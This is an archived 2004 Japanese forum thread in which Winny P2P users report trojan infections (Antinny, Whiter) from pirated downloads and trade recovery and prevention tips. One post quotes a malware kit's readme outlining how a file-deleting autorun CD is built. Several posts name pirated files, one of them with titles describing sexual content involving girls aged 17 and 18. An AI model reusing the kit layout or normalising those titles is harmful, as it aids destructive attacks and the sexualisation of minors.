533 :[名無し]さん(bin+cue).rar:04/02/22 16:50 ID:f0U3irM2
>>531.
それは負荷が高すぎて、
処理がうまく働いていないだけだと思います。
キャッシュを消せば症状が改善されると言うのも納得。
恐らくHDDかメモリがネックになっているのでしょうけど。
キャッシュかダウンフォルダの内容が消えていたとなると、
考えないといけません。

無視ワード登録や設定のキャッシュ数を減らしてみると負荷は減りますよ。
「無視ワード」は負荷を高めるのに一役買いますから、
もし、普段から登録設定していれば、整理したほうがいいです。

534 :[名無し]さん(bin+cue).rar:04/02/22 19:37 ID:OYQSdmZC
WORM_ANTINNY.Aってふるい奴?

535 :531:04/02/22 20:39 ID:a8x4JYTQ
>>533
図星でしたw
こないだWhiterにやられたもんで臆病になってます^^;
無視ワード整理します。
ありがとうございました。

536 :[名無し]さん(bin+cue).rar:04/02/23 07:12 ID:qmrqHgpB
>>518
htmlの拡張子.folderについては
詳細表示時の時に種類がフォルダになっており、
普通のフォルダはファイルフォルダになってる。
これで見破れるんちゃうんかと。

537 :[名無し]さん(bin+cue).rar:04/02/23 10:38 ID:sP4fJYNz
>>535
いやなんのなんの。ハハハ

538 :[名無し]さん(bin+cue).rar:04/02/23 13:48 ID:9pIuvDq8
今日スキャンしたらBackdoorとやらが居たようです。
nyと関係が有るのでしょうか。
火壁はoffしています。

539 :[名無し]さん(bin+cue).rar:04/02/23 13:53 ID:NxWIN4W+
>>538
関係大有り。今ごろ君の個人情報はネット上を彷徨っている

540 :[名無し]さん(bin+cue).rar:04/02/23 14:45 ID:/CH0I3Dr
今日WINNYを使っていてたぶん↓のファイルだと思うのですが、解凍するとウィルス?が入っていた
みたいなんですが、CPUの使用率がずっと80%↑になり動作が凄く遅くなって固まったり、
不具合が出るようになりました。一応キャッシュは残っていました。これはウィルスのせいなんでしょうか?
またウィルスであればなんていうウィルスなんでしょうか?分かる方いたら教えて下さい。
(隠撮 素人ナンパ) 潮吹き美少女 ひろみ18歳(2人としちゃった).mpg.lzh
【焙煎にんにく】 癒し系・援交 美少女物語 番外編Vol.06(新・女子高生の放課後07)笑顔でジョリまん ひろみ17才


541 :[名無し]さん(bin+cue).rar:04/02/23 14:47 ID:nitK8GwA
むしろスキャンしろと。

542 :[名無し]さん(bin+cue).rar:04/02/23 15:06 ID:JGaPO8cu
>>540
ここはmpg.lzhは 無視に入れてあるって前提で話してあるので消えてください。

543 :[名無し]さん(bin+cue).rar:04/02/23 16:56 ID:ANd9eVVY
>>540
おまえに説明しても
たぶん理解できんだろう。
手っ取り早い方法はOSをクリーンインストしろ


544 :名無しさん ◆MjfDbJSKMc :04/02/23 18:52 ID:TjQZF1M/
そういえば自分もウイルスっぽいのにかかってしまいました。

詳細情報
ファイルをダウンロードしたい人は下を。

2b4ec038238a0d3e88c26f6e7aa1178e

ウイルスバスター2004最新パターンファイルで未反応。
「夏色こみにゅけーしょん」(だったと思う)というタイトルのソフト
シムシティ4が自動的に起動。
ファイルが無差別に消される。
アイコンはひまわりみたいなもの。
ファイル名は「nocd.exe」

対処方法:
システムのクリーンインストール。

その後、復元でファイルを復元。
Dドライブにファイルを入れておいたのが幸い。


545 :[名無し]さん(bin+cue).rar:04/02/23 20:14 ID:gS8HS7Mj
とりあえず、落としたファイルをAVGでスキャンしとけば安心ですかね?

546 :[名無し]さん(bin+cue).rar:04/02/23 20:17 ID:fJcxpKAH
とりあえず

ならね

547 :[名無し]さん(bin+cue).rar:04/02/23 20:23 ID:W85OYqB6
nyしなきゃ感染しない

548 :[名無し]さん(bin+cue).rar:04/02/23 20:24 ID:NxWIN4W+
>>545
すぐ上を見てもそう思うかい?

549 :[名無し]さん(bin+cue).rar:04/02/23 20:35 ID:kNK6RjB5
PC再インスコして、autorun切るのすれてて、「Autorunを切ってないような初心者は少し痛い目を見てください。 Version 2」
っつーのに引っかかってしまいますた。。。
すぐにタスクマネージャーからそれらしいの切ったんですけど、このまま再起動しても大丈夫でしょうか。。。
こんなtxtファイルも同封されてました。
=======================================================================
◆ファイル構成

  6つ揃えてCDに一緒に焼き込めば、即席で亜種が作成できます。
  ただのbatなのでノートン先生も何のその。(そーでもない)
  悪用した結果は自己責任ですよ。(ひっかかる人いないだろうけど)

Autorun.inf Setupが起動するように指定。
Setup.bat bug起動、分身作成、Setupcfg起動。
bug.exe 67氏作成対半島用ソフト。詳しくは自分で調べましょう。
    bug.exe.lnk   再起動時にも音が鳴るように工夫。馬鹿は辛い……。
winny.sys bugの効果音。MIDI、WAVをリネームして使う。
Setupcfg.bat ファイルを消す。それだけ。
Readme.txt このファイル。
    その他 ただのカモフラージュ。別名容量稼ぎ。byねつ造君。
=======================================================================

550 :[名無し]さん(bin+cue).rar:04/02/23 21:39 ID:gIl79i4M
いやー、はっはっはっ






HDD全消去

久々枕を涙で濡らせそうです

551 :[名無し]さん(bin+cue).rar:04/02/23 21:44 ID:aFnd7eKK
>>549
誰かから「大丈夫です」と言われるまでまってるの?
再起動してみよう!!ニヤニヤ

552 :[名無し]さん(bin+cue).rar:04/02/23 21:46 ID:/qUq2Z8n
ノートン先生2004がいればモウマンタイ

553 :[名無し]さん(bin+cue).rar:04/02/23 21:49 ID:rwacU+gP
>>549
起動するとき何を読み込んで実行するか考えればチェックするところは分かるだろ。
それが分からないなら足を洗った方が。

554 :[名無し]さん(bin+cue).rar:04/02/23 21:53 ID:JGaPO8cu
>>549
今すぐハードディスク買って来てそこにOSいんすこしろ
デュアルブートでもいいが
あほそうだし
HDかって来い

555 :[名無し]さん(bin+cue).rar:04/02/23 22:00 ID:y4jAkVz/
Windows2000でWORM_ANTINNY.Aに感染したけど
感染ファイル削除して再起動したら再スキャンしても何も出てこなくなった。
これってセーフ?

556 :[名無し]さん(bin+cue).rar:04/02/23 22:08 ID:a4dbUqxi
>>555
俺なんてここ1ヶ月で7回もantinny感染してるし
でもなぜかキャッシュフォルダ全削除されるだけで何も起こらない

557 :[名無し]さん(bin+cue).rar:04/02/23 22:34 ID:fJcxpKAH
>>550
途中で気づくべし。
気づいた瞬間、電源長押し

558 :[名無し]さん(bin+cue).rar:04/02/23 22:44 ID:gIl79i4M
>>557
いやはや、気づいたときにはブートローダまで消されてたらしく、どうにもなりませんでしたがな
さっきは予備ノートで書き込みで、今はどうにか被害パソが復旧、、、
こまめにバックアップ取らなきゃいけないという教訓になりますた

ああ、死んだ猫ちゃんの写真も一緒に逝ってもうた、、、

559 :[名無し]さん(bin+cue).rar:04/02/23 22:51 ID:og9R+Sd5
外付けのHDDを買ってきて、そこにバックアップをとっておく。
怪しいファイルを実行するときには、外付けのHDDの電源を切っておく。
これでHDD全消去を食らっても痛くない。

仮想PCを使えばこんな事もしなくていいんだが。

560 :[名無し]さん(bin+cue).rar:04/02/23 22:52 ID:/AB/KlAP
>>600
必死だな( ´,_ゝ`)プッ

561 :[名無し]さん(bin+cue).rar:04/02/23 22:56 ID:og9R+Sd5
>600に期待。

562 :[名無し]さん(bin+cue).rar:04/02/23 23:00 ID:NxWIN4W+
>>560
預言者、発見!

563 :[名無し]さん(bin+cue).rar:04/02/23 23:41 ID:C8prjemI
>>560
あんた凄いな

564 :[名無し]さん(bin+cue).rar:04/02/23 23:43 ID:ITmtyoiX
またこの流れか・・・

565 :[名無し]さん(bin+cue).rar:04/02/23 23:59 ID:yxWen30M
しかしなんでそんなに簡単にANTINNYに感染するんだ?
やばいもの扱おうとしてるんだからそれ相当の装備しとけよ

566 :[名無し]さん(bin+cue).rar:04/02/24 00:03 ID:PRRb5JpN
全くだ
せめてウイルス駆除ソフトくらい入れとけよ

567 :[名無し]さん(bin+cue).rar:04/02/24 00:08 ID:GgYD24sT
どんなフォルダ開いても
すぐ検索コンパニオンが出てくるけどこれ何?

568 :[名無し]さん(bin+cue).rar:04/02/24 00:17 ID:hTotyrNS
>>567
↓これか?

>フォルダを開くと検索画面が起動する
>
>原因
>フォルダオプションで誤った操作をした。
>
>対処方法
>エクスプローラを起動。
>メニューバーの「ツール」→「フォルダオプション」(もしくは「表示」→「フォルダオプション」)をクリック。
>「ファイルタイプ」のタブをクリックし、一覧から「ファイルフォルダ」を選択して「編集」をクリック。
>find が太字で表示されているので「標準」ボタンをクリックして細字に戻す。
>「閉じる」「閉じる」をクリックして設定を保存。

ANTINNY対策か何かでフォルダオプション変にいじったんじゃないか?

569 :[名無し]さん(bin+cue).rar:04/02/24 00:21 ID:RWmRDNnJ
>>565
ヤバイということがわかってない人が大勢いるんですよ。
ただそれだけのはなし。

570 :[名無し]さん(bin+cue).rar:04/02/24 00:21 ID:s4sF0D6H
おまえら
日光にあたんないから
ウィルスになんか感染するんだよ
たまにはパソコン、日光浴させてみそ
そして寒風マッサージだ
風邪一つ引かなくなるぞ


571 :[名無し]さん(bin+cue).rar:04/02/24 00:36 ID:wCV9Hv3B
>>570
「さむかぜマッサージ」と読んでしまった。。。_| ̄|○


572 :[名無し]さん(bin+cue).rar:04/02/24 00:43 ID:OHnh0HBU
ひょっとして、乾布摩擦の事を言ってるのか?(AA略

573 :[名無し]さん(bin+cue).rar:04/02/24 00:53 ID:LXVmcUKF
たった今W32.Whiter.Trojanにやられた・・・
HDDのデータすべてが0バイトに書き換えられ消去された!
先日ANTINNYにやられOSの再インストールするのでデータを
バックアップしておいたHDDが完全に消去された・・・
しかもリストアの前だというのに・・・呆然ですわ・・・
現在FinalDataにて復元を試みているがデータが戻ってこなければ最悪です。
はあ・・・どしよ・・・_| ̄|○

復元する道はなにかないですか?
マジレスお願いしますm(__)m

現在ノートPCにて



574 :[名無し]さん(bin+cue).rar:04/02/24 00:57 ID:+VIyL/XG
ブラクラ、グロには引っかかるけど、ウィルスなんて一度も感染したことないよ。
そんなぼくは今年でPC歴10年目です。

575 :[名無し]さん(bin+cue).rar:04/02/24 00:59 ID:46R+zZ3i
>>574
>ブラクラ、グロには引っかかるけど

自慢なのか自虐ネタなのかワカラン

576 :[名無し]さん(bin+cue).rar:04/02/24 01:03 ID:+VIyL/XG
>>573
ウィルスも戻ってくるんじゃ((((((;゚Д゚))))))ガクガクブルブル

577 :[名無し]さん(bin+cue).rar:04/02/24 01:07 ID:kkdrzYLE
>>573
>>557

578 :[名無し]さん(bin+cue).rar:04/02/24 01:09 ID:sMz33Ivt
W32.Pinfi というのにやられた。http://www.symantec.com/region/jp/sarcj/data/w/w32.pinfi.html
そのとき開いたのはシリアル集2004年度版とAtok17かなんかだったとおもう。
winnyつないだまま、出勤。帰ってみたら、なにやらエラーメッセージが。。。
windowsを動かすのに必要なシステムファイルが別verに置き換わっています。
修復のためCDをいれてください。とかなんとか。
入れてもエラーが出るばかりで全然だめ。
やむなく再起動するとWinが完全に死んでいるのに気づく。
再インストールしたもののwinnyがはいっていたドライブのデータが
フォルダを残して全滅。UPフォルダに入れてた動画データのあるドライブ
も1/4消失。総計100G弱消されていた。
FinalDataで修復も半分も戻ってこなかった。
くそ〜いままでウイルスんなんかに感染したことなかったので油断していた。ヽ(`Д´)ノ


579 :[名無し]さん(bin+cue).rar:04/02/24 01:15 ID:+VIyL/XG
ハードディスクを復元出来るソフトはないですか?

580 :[名無し]さん(bin+cue).rar:04/02/24 01:26 ID:nKFgrsHy
>>573
復元できないように0バイトに書き換えるんですよ

581 :[名無し]さん(bin+cue).rar:04/02/24 01:41 ID:kkdrzYLE
漏れがWhiterの被害にあったときは、Dから消していくウィルスで
フォルダは残るが、ファイルは消える。そういう症状だったんだが・・

なんか違うらしいね。

582 :ぼるじょあ ◆yBEncckFOU :04/02/24 02:09 ID:at+pO8dF
>581
何種類かあったと思うYO!

583 :[名無し]さん(bin+cue).rar:04/02/24 03:09 ID:Yphzq6Ln
さっきwinny起動したら

 abnormal program termination

って出て動かない。。。
昨日まで普通に動いてたのになんで??

584 :[名無し]さん(bin+cue).rar:04/02/24 03:17 ID:46R+zZ3i
なんかny起動しないって報告増えてきたな
なにが起こってるんだ?

585 :[名無し]さん(bin+cue).rar:04/02/24 03:21 ID:t0N4t8kz
ここでノートン先生の偉大さがわかりまつね

586 :[名無し]さん(bin+cue).rar:04/02/24 04:12 ID:TiceOakk
とりあえず、ウイルスの作者に死の呪いをかけますた。

587 :[名無し]さん(bin+cue).rar:04/02/24 06:13 ID:at+pO8dF
>>585
死ねよ。営業。

588 :[名無し]さん(bin+cue).rar:04/02/24 06:42 ID:+D0WX1hY
>>587

アフォかぁ、オマイ
素でNET遣ってるのか・・・・・・と小一時間

589 :[名無し]さん(bin+cue).rar:04/02/24 06:57 ID:0V9qLQ9Z
BIOSヤラレタ・・・。泣。
ノートン先生様すら発見できなかったみたいです。
もまいら、UPフォルダが突然追加されたら気をつけれ。

590 :[名無し]さん(bin+cue).rar:04/02/24 08:27 ID:tK9X2JJr
ここでよく見かけるZONEの卒業なのですけど、
自分が落としたのは拡張子が.mp3だけの奴(5,6Mくらい)だったのですが、
WMPで起動したところ

「拡張子がファイル形式と一致しません」

と表示。
「ありゃ?これはただの捏造ファイルかな?」
と思い削除した後にこのスレに来てみたら、
こんなに被害報告が・・・(((( ;゚Д゚)))ガクガクブルブル
これも一種のウィルスだったのでしょうか?
ウィルス検索しても無反応ですし、
再起動しても何一つ変わった様子はありませんし・・・





591 :[名無し]さん(bin+cue).rar:04/02/24 08:38 ID:46R+zZ3i
ZONEの新譜はほとんど、バックドア(トロイ)が入ってたからヤバイかも
見た目の変化では判らないと思う
アンチウイルス、またはオンラインスキャンしてみて

592 :[名無し]さん(bin+cue).rar:04/02/24 08:39 ID:46R+zZ3i
>ウィルス検索しても無反応ですし

あぁ、チェックしたのか
多分、発動出来なかったのかもしれない
あまり自信ないので、どなたかフォローよろしく

593 :590:04/02/24 08:58 ID:tK9X2JJr
>>591-592
即レスありがとうございます。

ちょっとした不安感は拭えないものの、
とりあえずギリギリなんとかセーフだったと思っておきます。


594 :[名無し]さん(bin+cue).rar:04/02/24 09:33 ID:VKewMsJg
>>544
ノートンでは「Trojan.Killfiles」として検出されました。
ただし、シマンテックのサイトには具体的な症状が書かれていません。

>>590
実行形式ファイルは、拡張子をcomとかexeとかscrにしない限り、ダブルクリックしても、発動することは、まずありません。
ただ、拡張子がtxtになっていて、かつ、そのファイルを高機能なテキストエディタで開こうとした場合、
拡張子に関係なく、テキストエディタが本当のファイル形式を判断して勝手に実行しまうことがあるそうです。

595 :590:04/02/24 09:55 ID:tK9X2JJr
>>594
どうもありがとうございます!

これから新譜にはなるべく手を出さないようにします。


596 :[名無し]さん(bin+cue).rar:04/02/24 10:33 ID:OWMOs8nP
あるソフトいんすとして
バージョンうpデートが入ってたから
それ実行したら
W32.Whiter.Trojanを発見されたみたいで
ノートンが検知して削除したんだけど
そのupデートでちゃんと
upはできてるみたいなんだよね。
本物にウイルスだけを組み込むことって出来るの??
そのソフトは普通に使えるんだけど
ウイルス駆除すれば本物と変わらないの?

597 :[名無し]さん(bin+cue).rar:04/02/24 10:51 ID:YgivrJxD
>>596
ぜんぜんオッケー

598 :[名無し]さん(bin+cue).rar:04/02/24 12:39 ID:BMi7/jdq
WINNYで違法ファイル集めてます
レジストリが使えなくなる
の続報

windows\system32配下の
説明がMSIME2002をすべて削除

DISK障害かもしれないがほっておくと
デスクトップのアイコンやらドキュメントやらが消えてしまう
もしくはMP3、AVIファイルがイカレル
俺は300近くやられた


599 :595:04/02/24 12:48 ID:OWMOs8nP
>>597
こういうのって本物のファイルに
ウイルスのコードを埋め込んでるだけなの?
こんなことってよくあるの?

600 :[名無し]さん(bin+cue).rar:04/02/24 13:07 ID:92txDjuF
アンチニー以外かかったこと無いが、
このスレ見てると怖くなるな・・・

601 :[名無し]さん(bin+cue).rar:04/02/24 14:01 ID:WLxdhLqX
ny歴半年ぐらいだけどウイルス未だに0

602 :[名無し]さん(bin+cue).rar:04/02/24 14:29 ID:tgLCiu+R
俺は一年経つけど同じくウイルス0
ヤバそうなのは全て生贄ノーパソで確認するし、バックアップもとってるから万が一でも平気

603 :[名無し]さん(bin+cue).rar:04/02/24 14:47 ID:16NGOwl3
>>600
ドウイ
俺も目立った被害は出てないけど怖くなってきた。
しかもこれ家族共有パソだし。
HDDが氏んだらオヤジにぬっ殺されますよ。
まあ俺が落としてるのは、ほとんど音楽だから
大丈夫なのかもしれんが。
ZONEの卒業も全部ハズレで何回かウィルス入りのまま
解凍しちまったけど、どうやらセーフっぽいし。

604 :595:04/02/24 15:02 ID:OWMOs8nP
まあ一応あとで発症して消えたりしたら
やだから
作ってある最適環境設定後のリカバリディスクで
OSを元通りにしといた。
元通りにまで5分だなんて
いい時代になったよね。

605 :[名無し]さん(bin+cue).rar:04/02/24 15:22 ID:nKFgrsHy
結局はバックアップが最大の防御なのディス

606 :[名無し]さん(bin+cue).rar:04/02/24 16:07 ID:WCQ2bRnn
ウィルス喰らったら通報ってよく言うけど、
ほんとに通報してるやつ一人でもいるのかね?
風俗いって悪い病気貰いましたって
病院に行くのと大して変わらんと思うんだが。
病院に行って売春禁止法で警察に
通報されることはまずあるまいが、
nyでウィルス報告したら薮蛇になりそうな気もするし。
まあしないだろうけどさ。
性病は生死に関わる場合もあるが、
ウィルスならせいぜいPCアボーンだしなあ。

AVS作ってる各社が、このスレとか張り付いて、
nyやりながらヤバげなファイル
日夜収集してたりするのでは、と妄想してみる。

607 :[名無し]さん(bin+cue).rar:04/02/24 16:13 ID:nKFgrsHy
>>606
パカモーン。Winnyを使うこと自体は不法行為ではない
買売春と一緒にするな

ぬ○ぽウィルスの時は勇者がSymantecに通報して
Symantecも速やかに普通に対応してくれたぽ



608 :[名無し]さん(bin+cue).rar:04/02/24 16:25 ID:cKDhxIkQ
むしろSymantecがウィルスをnyで流している。
と、言ってみるテスト。

609 :[名無し]さん(bin+cue).rar:04/02/24 16:53 ID:2D8hNjYB
最小化、最大化、閉じる等のボタンが
□や×から数字に変わってしまいました
原因はny以外考えられません
こんな症状他に誰かでませんでしたか?

610 :[名無し]さん(bin+cue).rar:04/02/24 16:54 ID:cKDhxIkQ
>>609
PC初心者板行きな。

611 :[名無し]さん(bin+cue).rar:04/02/24 16:55 ID:KlkN0UEM
それはひょっとしてギャグで言ってるのか!? (AAry

612 :[名無し]さん(bin+cue).rar:04/02/24 17:12 ID:UAEshYJd
>>609 Windowsの仕様 nyは無関係

613 :[名無し]さん(bin+cue).rar:04/02/24 17:47 ID:2D8hNjYB
てめえら。。。
ゴメンナサイ……

614 :[名無し]さん(bin+cue).rar:04/02/24 17:58 ID:87ihIKFE
550ですが、ようやく復旧
消えたのは思い出のみ、、、ってこれが一番痛いか

615 :[名無し]さん(bin+cue).rar:04/02/24 19:32 ID:/pR1ohXi
(一般コミック) 福本伸行 賭博破戒録カイジ 第11巻 (縦1200).zip 69,939,204 35237e13f37d7cfac0a895285244b009

をマカフィーと別のPCではノートンで検査したけど
ウィルスはみつからず、でも解凍しようとしたら
書庫が壊れてるだった。もしかし、えんがちょ食らった?
でも悲惨少量とかあったから、自分がダウン失敗しただけかなぁ・・・
誰か教えてけれ。upフォルダとぬるぽ字はまだ入ってなかったけど・・・

616 :[名無し]さん(bin+cue).rar:04/02/24 19:39 ID:46R+zZ3i
コミックスレに逝って本物がどうか聞いたらどう

617 :[名無し]さん(bin+cue).rar:04/02/24 20:21 ID:3AXGWBsa
書庫が壊れてるでびびってるんかよww
なんもおきねーよ

618 :[名無し]さん(bin+cue).rar:04/02/24 21:08 ID:b2zyzL4E
あのう間違えてフォルダのアイコンのexe実行
しちゃったんですよ、それで
やべ、とおもってすぐPCの電源おとして
調べたら
WORM_ANTINNY.Aらしいんです
でもそのファイル削除したあとオンラインスキャンしたらなにもはっけんできないんです
これは一応セーフだったと考えていいですか?

619 :[名無し]さん(bin+cue).rar:04/02/24 21:13 ID:/pR1ohXi
((((((;゚Д゚))))))ガクガクブルブル

620 :[名無し]さん(bin+cue).rar:04/02/24 22:07 ID:q4B6H3qU
最近落としたファイルを解凍してからメディアプレイヤーなどを使うと
CPUを凄い使うようになりました。(たぶん気のせいではないです。)
ノートンを使っても検出はしないんですが、タスクマネージャーで見ると
EXPLORER.EXE
System
System Idle Process
の3つが凄いCPUを使ってるみたいなんですがウィルスなんでしょうか?

621 :[名無し]さん(bin+cue).rar:04/02/24 22:08 ID:udqlSK4n
こりゃまたすごいのがきたな・・・

622 :[名無し]さん(bin+cue).rar:04/02/24 22:09 ID:kkdrzYLE
ただのEXPLORERの暴走かと。

623 :[名無し]さん(bin+cue).rar:04/02/24 22:10 ID:GgYD24sT
>>568
せっかく教えていただきましたが
それやっても無理でした


624 :営業:04/02/24 22:13 ID:t0N4t8kz
皆ノートン2004買おうよ!最高だよ!( ´,_ゝ`)

625 :[名無し]さん(bin+cue).rar:04/02/24 22:17 ID:kkdrzYLE
フリーで十分
それにノートンは重(ry

626 :[名無し]さん(bin+cue).rar:04/02/24 22:25 ID:t0N4t8kz
>>625
低スペックマシン野郎は帰れ
ノートン様に失礼

627 :[名無し]さん(bin+cue).rar:04/02/24 22:25 ID:kkdrzYLE
低スペPCじゃなくても無駄に負荷を掛ける理由は無し。

628 :[名無し]さん(bin+cue).rar:04/02/24 22:37 ID:NYl9R7wx
俺も使用者名が「Winnyで違法ファイル集めてます(^^)v」になったーー。
今日気づいたんだが、winny downフォルダー内のデータを再起動の度に
「・・・.avi」を勝手に二つのデータだけ、「・・・.avi_________.exe」に
するみたいだ。今のところノートンでも検知できないみたい。
とりあえずどうしたらいい?
それ以外の悪さは今のところしてないみたいだが・・・。

629 :[名無し]さん(bin+cue).rar:04/02/24 22:38 ID:fK0GrK04
>>620
再OSインスト。初心者はそれが一番てっとり早い。

630 :[名無し]さん(bin+cue).rar:04/02/24 22:39 ID:EOO+wtLu
となりのおやじの犬逃がす。ハイ!
 (( (`Д´) (`Д´)
  (/ /) (/ /) ))
  < ̄<  < ̄<

あるある探検隊!
 あるある探検隊!
 _(Д´ )  _(Д´ )
  ヘ|  |\  ヘ|  |\
    <      <



631 :[名無し]さん(bin+cue).rar:04/02/24 22:39 ID:hTotyrNS
>>623
「フォルダを開くと検索画面になる」でぐぐったら
一発で出てくる。

もう解決してるかもしれんが。

632 :[名無し]さん(bin+cue).rar:04/02/24 22:51 ID:GgYD24sT
>>631
もうさんざんやったけど無理でした

あとはもうOS再インストしかないですか?

633 :[名無し]さん(bin+cue).rar:04/02/24 23:00 ID:hTotyrNS
>>632
レジストリいじってもダメだったんなら、すまんが俺にはわからない。
PC初心者板かWindows板にでも行ったら何かわかるかもしれんよ。

634 :544:04/02/25 00:20 ID:XloRP+LF
>>594
ウイルスバスターでは未だウイルスに引っかからず・・。

これって送ってみたらパターンファイル作ってもらえるかな?

635 :[名無し]さん(bin+cue).rar:04/02/25 01:19 ID://ufOb7P
(一般ゲーム)Deus EX デウスエクス 日本語版(CCD).rar 501,706,600 08835717e67c643677664bf6c8884efc
というのを落としてインストしてプレイしたところゾーンアラームのログに
デウスエクス カウント1とだけ表示されたものがあったので(アクセス禁止しても表示される)
spybotでスキャンしたら、
自分でデスクトップに作ったexeファイルのショートカットにRSE721っていうダイアラーが検出された。
にも拘らず、なぜか元のexeファイルからはなんも検出されないんだけどこれってどうなんですか?
ショートカットは駆除したんだけどこのままだとちゃんと駆除できてないですよね?
FWのログにも相変わらず起動するたびに表示されるし・・・

636 :[名無し]さん(bin+cue).rar:04/02/25 06:45 ID:R8DI2F+8
>>635
がんばれ、>>635がんばれ、

637 :[名無し]さん(bin+cue).rar:04/02/25 09:58 ID:9Go7GFxk
OSの再インストで済む程度なら、よかったと思いねぇ。

638 :[名無し]さん(bin+cue).rar:04/02/25 10:20 ID:ev71TQR+
フリーのウィルススキャンって、AVGとか信頼できます?
昔はオンラインウィルススキャンでずっといってたころは
なにも検知してなかったのに、市販のやつでスキャンしてみたら
Cドライブのほとんどすべてのファイルにびっしりウィルスがいたし…。

あと>>139みたいに、.jpgに偽装したトロイとかってノートンはちゃんと判断してくれるんでしょうか?
.jpgだとなんか安心してたので、そんな技使う人がいるなんてびっくりです。つうか
拡張子とアイコンがそれなら完全に安心しきりそうで怖い。
関係ないけどブラピ公開の新作映画にトロイ仕込む人とが必ずいるんだろうなぁ

639 :[名無し]さん(bin+cue).rar:04/02/25 10:23 ID:9n+WoflO
>>638
このスレ全部読んでみろよ。
ノートンやバスターを過信して感染した馬鹿がウヨウヨいる
結局何を使おうが本人次第って事がわかるだろう

640 :[名無し]さん(bin+cue).rar:04/02/25 11:49 ID:2tLR/sZZ
>>639がいいこと言った

641 :[名無し]さん(bin+cue).rar:04/02/25 12:38 ID:SYX7KqWu
はぁ・・・ウィルスか何か知らんが、HDDの中身全部消去されますた・・・。

落としたのは「Postal2パワーアップキット」とかいうやつで
DaemonTool(自動起動オン)にぶち込んだ瞬間にHDDがカリカリ言いはじめ
これはヤバいかもと思ってすぐさま再起動するも後の祭り、
Cドライブの中いじられてDと外付HDD120GBはフォルダだけ残して全消去。

一応FinalDataの試用版でスキャン中ですが全くファイルが引っかかりません。
5年分の思ひ出(デジカメ画像とか)が一瞬でパーに・・・。

これからどう逝きていこうか・・・。

642 :[名無し]さん(bin+cue).rar:04/02/25 12:53 ID:lAl1JR0s
>>641
今更だけどそういう時はすぐ外付けはずせよ

643 :641:04/02/25 12:53 ID:SYX7KqWu
ハッシュは不明、サイズは確か130MBくらいだったと思います。
皆さんもお気をつけて。

つか、nyやめます。もう懲りた。

644 :[名無し]さん(bin+cue).rar:04/02/25 12:57 ID:vW+f4WeR
ナナナーナー
ナナナーナー
ヘイヘイヘイグッバーイ

645 :[名無し]さん(bin+cue).rar:04/02/25 13:16 ID:kpF2tIZs
>>641
ツーかそれ
今までずっと言われてたけど??
もう10人はそれで引っかかって書き込んだ奴みたぞw
実際はもっといるだろうなあ
まあご愁傷様。
つーか5秒ぐらいで電源ぶちぎっても
全部消えたのか??
ちなみにそれW32.Whiter.Trojanだから
修復は事実上無理だよ。

646 ::[名無し]さん(bin+cue).rar:04/02/25 13:25 ID:Sd+4H69i
>>645
5秒じゃとても間に合わないと思う。


647 :[名無し]さん(bin+cue).rar:04/02/25 13:32 ID:rJ4sAIjR
ny使いはPC2台所有は必須、と痛感したのでnewマシン用パーツ注文しますた。

648 :[名無し]さん(bin+cue).rar:04/02/25 13:37 ID:8IU1Nege
>>647
VPCインストールしてOSをエミュレートすればいいだけだろうに


649 :[名無し]さん(bin+cue).rar:04/02/25 13:40 ID:kpF2tIZs
>>646
本当だ。
W32.Whiter.Trojan実行してみたら
一瞬でフォルダだけ残して
ファイルが消えてったよ…
ちゃんとバックアップしなきゃの実感するな

650 :[名無し]さん(bin+cue).rar:04/02/25 13:49 ID:rJ4sAIjR
>>648
ウイルスのためだけでなく、膨大な動画を全部見続けるには別マシンがどうしても要る。

651 :[名無し]さん(bin+cue).rar:04/02/25 13:54 ID:kpF2tIZs
>>648
そのVPCがウイルスな罠

652 :[名無し]さん(bin+cue).rar:04/02/25 14:58 ID:Hj3SqeSv
デーモンツールの自動起動を切るのはどーしたらいいですか?教えてください!!

653 :[名無し]さん(bin+cue).rar:04/02/25 15:00 ID:wt7xEuDw
PCを窓から投げ捨てろ

654 :[名無し]さん(bin+cue).rar:04/02/25 15:01 ID:cxouSFfc
通行人あぼーん!!

655 :[名無し]さん(bin+cue).rar:04/02/25 15:09 ID:m417O2PJ
オプションからオートスタートを切るとか

656 :[名無し]さん(bin+cue).rar:04/02/25 15:15 ID:q6SbqpfN
>>652
もしかして勘違い? >>6

657 :[名無し]さん(bin+cue).rar:04/02/25 15:22 ID://ufOb7P
>>636-637
いや詳しい話がききたいんですが・・


658 :[名無し]さん(bin+cue).rar:04/02/25 15:22 ID:BfGg10tr
あのレジストリにアンティニーはいったんだけど
どうすれば削除できるの?

659 :[名無し]さん(bin+cue).rar:04/02/25 15:24 ID:vW+f4WeR
>>658

>>611

660 :[名無し]さん(bin+cue).rar:04/02/25 15:57 ID:ev71TQR+
(アルバム)オムニバス・ヒーリング - image イマージュ(2000.08.23)葉加瀬太郎、ゴンチチ、坂本龍一 他.zip 54,561,640 35b2e81ac19003081a6f1da3363421f8


圧縮されたフォルダ内オムニバス・ヒーリング - image イマージュ(2000.08.23)葉加瀬太郎、ゴンチチ、坂本龍一 他..exe
にアンティニーがいてノートン先生が駆除しました。
駆除した後、中身のファイルがつかえたら、こういう場合は模造警告とかは
だすべきかださざるべきか?

661 :[名無し]さん(bin+cue).rar:04/02/25 16:01 ID:uNQAR4jX
>>641
正規品は580MBぐらいあったぞ
ちゃんと買ったやつだからハッシュはないがな

662 :[名無し]さん(bin+cue).rar:04/02/25 18:32 ID:9n+WoflO
>>648
VPCたけーじゃん。VPC買える金額で中古PCが買えるよ。
割ればいいけど>>651が言ってるようにプログラムファイルは危険だし。
別PC用意したほうが物理的バックアップにもなるしね。


663 :[名無し]さん(bin+cue).rar:04/02/25 19:09 ID:XCHnD7f+
VPCMACならあるんだが・・・・

664 :[名無し]さん(bin+cue).rar:04/02/25 20:06 ID:Q5e8Fas5
感染しないためにやっておくべきこと
・ファイルの拡張子は表示させる。開くときは拡張子を確認 [必須]
・シングルクリックをダブルクリックにする
・アンチウイルスソフトのインストール、常駐、定期的に更新 [常駐必須]
・落としたファイルは必ずウイルススキャン
・exe, *.lzhなどの二重拡張子を無視リストに(ただし、マシンに負荷が掛かる)
・lzh,zip,rarなど圧縮ファイルは解凍後要注意
・exeファイルは完全自己責任
・こまめにバックアップ
・nyをProgramFilesに置かない、CacheとDownフォルダは詳細表示にする
・whiter対策としてC:\Windows\SystemにWhismng.exeフォルダ作成
 (フォルダ名と同じファイルは置けないので防止できる)
・WhiterVBS簡易チェッカーでチェックしてみる
 http://mxtrojan.at.infoseek.co.jp/column02.html
・怪しい・危険なファイルはWinnyFileDatabaseでチェック
 http://nydb.info/
・CCDはautorunを切ってdaemonでマウントして
